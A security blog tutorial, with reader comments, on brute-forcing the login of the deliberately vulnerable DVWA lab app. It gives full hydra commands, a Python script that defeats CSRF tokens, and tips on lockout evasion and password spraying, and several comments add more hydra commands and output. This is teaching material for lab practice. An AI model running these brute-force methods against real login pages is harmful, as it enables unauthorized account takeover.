DVWA Brute Force Logo

Brute Forcing Web Logins with DVWA

In this tutorial, I will show you how to beat the Low, Medium and Hard levels of the brute force challenge within DVWA (Dame Vulnerable Web App). 

If you want to follow along and have not yet got DVWA setup, take a look at this tutorial on Setting up a Vulnerable LAMP Server. This will run you through setting up a vulnerable virtual machine and installing DVWA. I have used this as bases for all my web hacking tutorials on Hemps Tutorials.

I have been meaning to write this tutorial for a while after the popularity of a previous tutorial Brute Forcing Passwords with THC-Hydra.  Which I cover using hydra to brute force a whole bunch of services exposed to the internet but in the brute forcing Webpage Login section I used a Firefox add-on called Tamper Data as the proxy to intercept the web requests and construct the hydra command.

The Problem is that Tamper Data no longer works in Firefox, this is since they transitioned to a new framework for developing Firefox extensions. This means we are going to have to use something else as a proxy and Intercept our web requests.

The best replacement for Tamper Data is to use Burp Suite as our proxy to capture the web requests we need to construct our hydra command.

Burp Suite

Burp Suite is a graphical tool for testing Web application security. Written in java, it has various tools that work seamlessly together to support the entire security testing process, from initial mapping and analysis of an application, through to finding and exploiting security vulnerabilities.

There are 3 different versions of Burp Suite. Enterprise, Professional and the free Community version as we are only going to need a fraction of burps potential in this tutorial, the free community version, should be just fine.

You can download burp suite for Linux, Mac, Windows or even in a Java JAR file which (It basically will run on anything that runs java) over at Portswigger site.

If you want more information about Burp Suite, check out this talk below “Web App Pen Testing with Burp Suite by Jason Nikola” from the recent SANS KringleCon.

Low Security

In the Low Security setting the DVWA Brute Force login prompt is just a straightforward HTTP GET request with no security in place to block or stop you from hammering it with hydra.

This will be exactly the same process I covered in Brute Forcing Passwords with THC-Hydra but this time I will be using Burp suite instead of Tamper Data to capture our requests.

Let’s get logged into DVWA which unless it’s been changed should be the standard username and password of admin/password and let’s make a start.

Step By Step Brute Force DVWA (Low Security)

  1. Set DVWA Security to Low

    Start by making sure DVWA’s security is set to Low, do this by clicking the DVWA Security button on the left menu and selecting the security level drop down to Low and click submit.



  2. Click The Brute Force button

    Click the Brute Force button on the menu on the left to enter the Brute Force Section of DVWA.

    DVWA Brute force

  3. Open Burp Suite and Setup Web proxy.

    Open up Burp Suite, once Burp is loaded, click the Proxy tab then Options and make sure you have a Proxy Listener setup.


    This should be set to your localhost 127.0.0.1:8080. You can adjust this how you need but if you are using this through your local web browser just leave these as default.

  4. Turn Intercept On

    Within Burp Suite move across to the intercept tab and make sure the Intercept button is on



    Burp is now ready to start receiving requests and all we have left to do is set up Firefox to send its requests to the web server via Burp.

  5. Network Settings in Firefox

    Within Firefox type about:preferences in the address bar this should take you directly to the preferences tab.

    .aboutpreferences

    Scroll right down to the bottom of the page until you see Network Settings then click the settings tab.

  6. Set Proxy

    You should now be in the Connection settings within Firefox. Set the radio button to manual proxy configuration. This needs to be set to your localhost on 127.0.0.1 and the port to 8080 unless you changed the port to something other than the default in step 3.

  7. Make a request.

    Now the proxy is all configured we need to make a request to the DVWA Brute Force page.

    In my example, I used a username UsEr and a Password PaSs then click the login button.

    Brute force login DVWA

  8. Request Received by burp.

    The request should get received by Burps Proxy.


    DVWA Burp Intercept
    Make a note of this request as we will need to use information from it to construct our Hydra command later.

  9. Failed Login Message

    In Burp Suite, click the forward button to forward our intercepted request on to the web server.

    Failed Login Message

    Due to not having entered the correct username and password, we get presented with an error message that states Username and/or password incorrect.

    Add this to your notes you have just taken of the request in step 8 this allows us to tell hydra anything other then this error message must be a valid login.

  10. Construct your hydra command

    Use the data Intercepted by burp to construct your hydra command as I have done below.

    hydra 192.168.0.20 -V -l admin -P ‘QuickPasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low”

    I will break this hydra command down for you…

    -V Verbose output showing the login + pass for each attempt in the terminal.
    -l admin Login using the login name Provided This could be a capital -L to try against a list of usernames.
    -P Load passwords from a file in my case this file is called QuickPasswords.txt.
    http-get-form Tells hydra we want to use a get request and follows with the location of the form we want to brute force, this information was gathered from the details intercepted in step 8
    username=^USER^&password=^PASS^ This adds place markers in our command where we want hydra to brute force the request (just replace where you see the actual username and Password used when logging in.
    :F=Username and/or password incorrect. This is the failure message noted from step 9 and tells hydra anything other then this message must be a valid login.
    H=Cookie: This is the Cookie information which gets generated when you login to DVWA and is only really needed because of that initial login page on DVWA. In the real world you wont normally be logged in to get to a login page.

  11. Run Hydra Command

    Run your hydra command, depending on the size of the password list used this should only take a few miniutes or so before it finds the correct password.

    Hydra DVWA Low

If you have issues with any of these steps above, please Leave me a comment at the bottom of this tutorial and I will give you any help you need to get you up and running.

Medium Security

The Medium Security setting extends the security from the low level by adding a time delay of 2 seconds on failed logins.

Re-run the Hydra command you used from Low Security, changing the security setting at the end of the command to medium.

hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=medium"

The Hydra command still works it just takes a little longer to run. This is because the PHP has been adjusted to add the two second time delay on all failed logins.

Luckily in DVWA we are easily able to check the PHP source code for all security levels, just click the view source button at the bottom of the DVWA Window. This will display the source PHP which shows the Login failed Sleep( 2 ) command as pictured below.

This shows adding a time delay on failed logins is not a deterrent or adequate protection from a brute force attack. The wait delay only increases the time needed to perform the attack, slowing down the attack speed.

High Security

Switching to the High Security level in DVWA extends on the medium level by making the time delay between failed logins a random number between 0 and 4 seconds, the Devoloper has also introduced a Anti Cross-Site Request Forgery (CSRF) token

If you just re-run the hydra command as we did with medium Security changing the security= at the end of the command too high as below..

hydra 192.168.0.20 -V -l admin -P '/home/vreality/Downloads/QuickPasswords.txt'  http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=high"

Hydra’s output will error saying its found 16 valid passwords found.

DVWA on high does not work with Hydra

before going any further let us use FireFox’s inspector element by right-clicking the webpage within firefox and choose Inspect Element and lets take a look at the html.

Drill down in Inspect Element until you find the HTML for the login form. notice there is now a hidden field with the name user_token being submitted with our GET request.

HTML for DVWA Brute Force Login on High

If you change the type=”hidden” to type=”text” you should see the hidden box render in your web browser.

Unhiden user token

If you remove all the characters from this un-hidden box and try to login we get a new error message that states CSRF token is incorrect.

CSRF token is invalid

Making burp intercept a login attempt shows the user_token with a string of alpha numeric characters added to the end of the GET request.

Forward on the intercepted request and have another go at logging in, notice that the user_token= has changed to another random alpha numeric string of characters.

This is the CSRF Token and is used to add credibility to the origin of the request being received by the server, this token is a impossible to guess random number generated by the server and is sent along with our GET request.

On the brute forcing page we are currently looking at, if the CSRF Token does not match, our request will error with the message “CSRF Token is incorrect” which we have just seen previously when we sent a request removing all the characters from the hidden user_token= field.

CSRF Token Is incorrect.

No longer can use hydra alone to brute force DVWA on the high security level as hydra does not have the ability to collect the CSRF token while making the request, so we have to get a little more creative to get this Brute Force to work.

There are a few different options for us to get around this, firstly we could use Burp this can be used to capture the CSRF token and run the brute force against the page using intruder tab in Burps menus but in the community edition using this feature only allows for a single thread to be run at a time greatly reducing Burp’s attack speed.

You can also combine Burp with Hydra, putting Hydra’s traffic through a proxy like Burp, This allows Burp to handle the requests and capturing the CSRF token, altering Hydra’s initial request, so it does not need to be aware of the CSRF Token and also bypasses Burps intruder limitations in the community edition.

Lastly we can have a go at creating our own brute forcing tool, which is the option i thought was most interesting and i will be covering below using python.

If you would like to see a tutorial for either using Burp or using Burp and Hydra to brute force DVWA on high security please let me know in the comments below and I will make a separate tutorial for these.

Using Python to Brute Force DVWA (High Security)

While researching for this tutorial I come across a post over on medium by Danny Beton https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39 where he covers step by step creating the python script that will allow you to capture the CSRF Token and brute force the login to DVWA on high security.

I did have to make a few changes to the original script from Danny’s page to get it working but only because I was having issues with the Password file adding 0x0n to the end of each brute force password attempt, I also wanted to see each password try output to the screen as the script runs.

My Edit to Dannys Brute Force Python script.

Below is my edited version of Danny’s Python script which i saved as DVWA-BruteForce.py.

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)

# set up our target, cookie and session
url = 'http://192.168.0.20/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'kjrkqb382512vao219va7sk0s4'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)

''' 
checkSuccess
@param: html (String)

Searches the response HTML for our specified success message
'''
def checkSuccess(html):
 # get our soup ready for searching
 soup = Soup(html)
 # check for our success message in the soup
 search = soup.findAll(text=success_message)
 
 if not search:
  success = False

 else:
  success = True

# return the brute force result
 return success

# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

# Display before attack
print 'DVWA URL' + url
print 'CSRF Token='+ csrf_token

# Loop through our provided password file
with open(filename) as f:
 print 'Running brute force attack...'
 for password in f:

# Displays password tries and strips whitespace from password list  
  print 'password tryed: ' + password
  password = password.strip()

  # setup the payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = s.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)

  if not success:
   # if it failed the CSRF token will be changed. Get the new one
   soup = Soup(r.text)
   csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
  else:
   # Success! Show the result
   print 'Password is: ' + password
   break

# We failed, bummer. 
 if not success:
  print 'Brute force failed. No matches found.'


You will need to download the Python modules beautyfulsoup and requests for the script above to work as these are not part of the default pre installed modules in Python.

BeautyfulSoup is a web scrapping library used to capture the CSRF token. Requests are what he used to make the requests to the web server. He also used argv to supply arguments to the script from the command line but this module already comes installed.

These modules can be installed using pip with the commands below.

sudo pip install requests
sudo pip install beautifulsoup

Also to get this to work you need to edit the URL = in the script to be the IP address of your DVWA web server, also you need to capture a PHPSESSID using Burp as we did previously in step 8 on the Low Security setting, add your PHPSESSID = to the script.

Run the Python Script using this command below adding the password list and the message which is received on a successful login.

python DVWA-BruteForce.py QuickPasswords.txt "Welcome to the password protected area admin"

If the Script works you should see an output like this..

DVWA High Security Brute Force Script Output.

Impossible Security

Brute Force and user enumeration should not be possible at the impossible security level in DVWA. There is now a lock out feature, where if there are five bad logins within 15 minutes the user account gets locked out.

If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. this should make it impossible to know there is a valid account on the system.

error message from failed login on impossible DVWA Brute Force

If time is not an issue we do have a couple of options here that would eventually brute force the login. We could Edit the python script we used on High Security and add a 15-minute wait after every 4 password tries. This would mean that you only try 16 diffrnet passwords a hour and if you had a huge wordlist could take you months or even years to complete.

The other option would be to use password spraying this is where you use one password against multiple users and because you are not hammering the hell out of a single user you end up not not hitting the lock out threshold .

If you would like to see some more information about Password Sparying leave me a comment below and i will make sure i add it to the list of future posts.

HomeWork

Using every thing that you have just learnt from this tutorial and the BruteForcing Passwords with THC Hydra tutorial. Set the DVWA security to low and use Hydra to try and enumerate\Brute Force the other four user logins and post your findings in the comments section below.

References:

Hemp

IT and security Expert with 20+ Years of Experience. _______________________________________________________ With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

31 thoughts on “Brute Forcing Web Logins with DVWA

  1. thanks man. first clear straight to the point no frills guide, im just starting to looking more serious into this stuff and trying to understand it from the basics on, cheers!

    1. Hi DonPorno, Thanks for the comment.

      That’s exactly why i made this guide if you have any questions drop me a comment on here or over on Social media.

      Hemp

    1. Hi Faisel

      Nice write up, The reason this works even on the hard setting is because the CSRF token is broken on the main DVWA login so medium and high security are basically the same.

      If you are ever interested in guest writing a tutorial hit me up at [email protected].

      Keep up the good work mate

      Hemp

  2. Thanks for your tutorial, is fantastic!!!!
    Can you see me a tutorial for either using Burp or using Burp and Hydra to brute force DVWA on high security.
    How you resolv error on Hydra’s output when found 16 valids passwords??
    Thanks

    1. Hi AVL

      Thanks for your comment.

      A tutorial on just using burp or burp using hydra through a proxy to brute force DVWA on high security is a good idea, Ill add it to my future tutorials list.

      when you get the 16 valid passwords it usually means you have either got your hydra syntax wrong or in the case of DVWA on high security there is a CSRF token in place which hydra cant deal with alone.

      Hope this helps.

      Hemp

  3. Hi
    sir my burp suite no intercepting the traffic . I have configured it to no proxy and 127.0.0.1 8080 but it not capturing any thing.
    without Cookies and Session id when I run the script it gives me wrong password and u-name pair?
    my script is
    hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
    and the output is
    root@kali:~# hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
    Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2020-12-29 12:04:08
    [DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
    [DATA] attacking http-get-form://127.0.0.1:80//DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.
    [VERBOSE] Resolving addresses … [VERBOSE] resolving done
    [ATTEMPT] target 127.0.0.1 – login “admin” – pass “asdfgh” – 1 of 12 [child 0] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “admin” – pass “password” – 2 of 12 [child 1] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “admin” – pass “qwerty” – 3 of 12 [child 2] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “bob” – pass “asdfgh” – 4 of 12 [child 3] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “bob” – pass “password” – 5 of 12 [child 4] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “bob” – pass “qwerty” – 6 of 12 [child 5] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “khan” – pass “asdfgh” – 7 of 12 [child 6] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “khan” – pass “password” – 8 of 12 [child 7] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “khan” – pass “qwerty” – 9 of 12 [child 8] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “” – pass “asdfgh” – 10 of 12 [child 9] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “” – pass “password” – 11 of 12 [child 10] (0/0)
    [ATTEMPT] target 127.0.0.1 – login “” – pass “qwerty” – 12 of 12 [child 11] (0/0)
    [80][http-get-form] host: 127.0.0.1 login: bob password: password
    [STATUS] attack finished for 127.0.0.1 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2020-12-29 12:04:09

    1. Hi Abdur,

      Are you saying that you cant capture any traffic with burp or just when you use hydra???

      If you cant capture any traffic with burp make sure you have the proxy details setup in your Web browser.

      If its the latter, you can use the Hydra_Proxy_HTTP or Hydra_Proxy command to proxy your hydra traffic through burp.

      let me know how you get on.

      Hemp

  4. hello sir I am getting an error as a new to this webapp pentesting I am not able to resolve it please help

    1. Hi, Ninjafurry Thanks for your comments…

      What’s the command you are actually trying to run I think you may have a typo in there causing this parse error.

      Check the command and if you are still getting this error copy and paste the command here and ill take a look at this for you.

      Hemp

      1. hydra 192.168.43.124 -V -l admin -P ‘/usr/share/wordlists/rockyou.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=omi079qgij3pt6rhuojhs4a371; security=low”

        This is the command I am trying

        1. Your command is correct ….. Just check that the PHPSESSID= and IP address is still correct.

          hmmm this is an interesting one do you get the same issue when you use a different program like curl…

          try something like this curl https://192.168.43.124/dvwa/vulnerablitites/brute/ do you get the same error.

          what O/S are you running? is it fully Updated?

          Let me know how you get on…

          Hemp

          1. Yes PHPSESSID and IP is correct

            while using curl i didn’t encounter any error ,

            cat /etc/os-release
            PRETTY_NAME=”Kali GNU/Linux Rolling”
            NAME=”Kali GNU/Linux”
            ID=kali
            VERSION=”2021.1″
            VERSION_ID=”2021.1″
            VERSION_CODENAME=”kali-rolling”
            ID_LIKE=debian
            ANSI_COLOR=”1;31″
            HOME_URL=”https://www.kali.org/”
            SUPPORT_URL=”https://forums.kali.org/”
            BUG_REPORT_URL=”https://bugs.kali.org/”

          2. my hydra is already latest version 9.1 , and I configured dvwa on local network . I tried to find some solution like ! / but can’t solve the error which is coming

          3. nope I didn’t follow your instruction to configure dvwa I think the problem is on terminal should I change zsh to bash and try . Or should I try your dvwa setup instruction ?

          4. i found a way but not sure is it right or worong if you can confirm it then it will be very helpful

            sudo hydra 192.168.43.124 -V -l admin -P “/usr/share/wordlists/rockyou.txt” http-get-form ‘dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low’

            as I am new to this

          5. Congrats that’s the start to becoming a hacker, Tweaking the command to work for your situation.

            Did you get the desired result?

            I’ve compared the two commands you sent me and the only difference I can see is you added sudo to the command and switched the backticks around.
            sudo hydra 192.168.43.124 -V -l admin -P /usr/share/wordlists/rockyou.txthttp-get-form dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low

            Interested to know though, if the failed response in burp on low security is now “Username and/or password incorrect, (with a comma)”… or if it was just a typo.

            Just remember Ninjafurry everyone starts somewhere and it’s all about Journey You take.

            Drop me a message here anytime mate and I will try and help if I can.

            Hemp

  5. I’m having a confusing experience – my password guesses are just hanging. If I add errors to the hydra command, I get 16 false positives. However, if the command is correct, it just returns a message that it is attempting the same 16 requests, but extends the time period for the response (see below):

    $ hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 192.168.2.116 http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2”
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-15 17:36:44
    [WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
    [DATA] attacking http-get-form://192.168.2.116:80/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456” – 1 of 14344399 [child 0] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345” – 2 of 14344399 [child 1] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456789” – 3 of 14344399 [child 2] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “password” – 4 of 14344399 [child 3] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “iloveyou” – 5 of 14344399 [child 4] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “princess” – 6 of 14344399 [child 5] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “1234567” – 7 of 14344399 [child 6] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “rockyou” – 8 of 14344399 [child 7] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345678” – 9 of 14344399 [child 8] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “abc123” – 10 of 14344399 [child 9] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “nicole” – 11 of 14344399 [child 10] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “daniel” – 12 of 14344399 [child 11] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “babygirl” – 13 of 14344399 [child 12] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “monkey” – 14 of 14344399 [child 13] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “lovely” – 15 of 14344399 [child 14] (0/0)
    [ATTEMPT] target 192.168.2.116 – login “admin” – pass “jessica” – 16 of 14344399 [child 15] (0/0)
    [STATUS] 16.00 tries/min, 16 tries in 00:01h, 14344383 to do in 14942:04h, 16 active
    [STATUS] 5.33 tries/min, 16 tries in 00:03h, 14344383 to do in 44826:12h, 16 active

    1. Hi Tom

      Thanks for your comment, Getting the syntax correct on this can be a right pain.
      Try swapping the security and PHPSESSID around…

      Your Command
      /dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb

      Try This !
      ‘/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb; security=low

      Making sure you keep an eye on the spaces between PHPSESSID and Security.

      Let me know how you get on?

      Hemp

  6. Hi there,
    I am doing the same thing as you have mentioned as my ethical hacking project brute force project part. But my result is not appearing and is keep on showing the status and tries and nothing happens. Could you please help.
    I am struggling with this issue.

    1. Hi Ambreen

      Could you please paste the command you are using in the comments???

      I can then take a look and hopefully be able to work out what the issue is.

      Hemp

  7. Thanks, for you reply. The problem has been resolved now. Hydra 9.1 is buggy, I have upgrade it to 9.2, and it is working all good now.

  8. Hi, Could you please help
    hydra 127.0.0.1 -V -l admin -P ‘Quickpasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/?username=USER&password=PASS&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSEED=etl6p7687vhql1ssfnmmpcdk80;security=low”
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-23 10:55:50
    [ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: F=Username and/or password incorrect.

    I got this error at the security level = low. Please help

    1. Hi Priya

      The http-get-form syntax is very unforgiving however The error message is stating that you have not added the ^USER^ and ^PASS^ tags to your command, see my example below.

      hydra 192.168.0.20 -V -l admin -P ‘QuickPasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low”

      Also, Make sure you keep an eye on the spacing at the end of the command (:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low)

      If you have not already, check out my more in-depth tutorial on brute-forcing passwords with hydra here

      Hope this helps, come back and let me know how you get on.

      Hemp

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top